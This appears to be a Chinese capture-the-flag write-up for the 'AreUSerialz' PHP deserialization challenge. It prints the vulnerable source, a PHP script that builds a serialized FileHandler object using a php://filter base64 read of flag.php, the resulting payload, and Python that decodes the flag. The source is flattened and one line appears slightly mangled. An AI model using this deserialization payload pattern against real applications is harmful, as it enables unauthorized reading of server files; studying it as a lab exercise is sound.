25.AreUSerialz
<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";$content = "Hello World!";$this->process();}public function process() {if($this->op == "1") {$this->write();} else if($this->op == "2") {$res = $this->read();$this->output($res);} else {$this->output("Bad Hacker!");}}private function write() {if(isset($this->filename) && isset($this->content)) {if(strlen((string)$this->content) > 100) {$this->output("Too long!");die();}$res = file_put_contents($this->filename, $this->content);if($res) $this->output("Successful!");else $this->output("Failed!");} else {$this->output("Failed!");}}private function read() {$res = "";if(isset($this->filename)) {$res = file_get_contents($this->filename);}return $res;}private function output($s) {echo "[Result]: <br>";echo $s;}function __destruct() {if(op === "2")$this->op = "1";$this->content = "";$this->process();}}function is_valid($s) {for($i = 0; $i < strlen($s); $i++)if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))return false;return true;
}if(isset($_GET{'str'})) {$str = (string)$_GET['str'];if(is_valid($str)) {$obj = unserialize($str);}}
代码审计后发现当参数op为2、str为带过滤的flag文件名作为url参数可以查看flag文件,序列化的代码如下,得到结果后注意序列化为字符串的参数个数和字符串长度,修改后得到url的字符串形式的对象参数
<?php
class FileHandler{protected $op=2;protected $filename='php://filter/read=convert.base64-encode/resource=flag.php';protected $content;
}$baimao=serialize(new FileHandler());
echo $baimao;
//str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
?>进入url后,发现了一推字符串,不认识,base64解码看看:
import base64str1 = 'PD9waHAgJGZsYWc9J2ZsYWd7OTZjNWJiZTgtZmE1Yy00NTQyLThiNzktM2EzMjcxMTM5N2JkfSc7Cg=='
str_decode = str(base64.b64decode(str1), "utf-8")
print(str_decode)得到flag
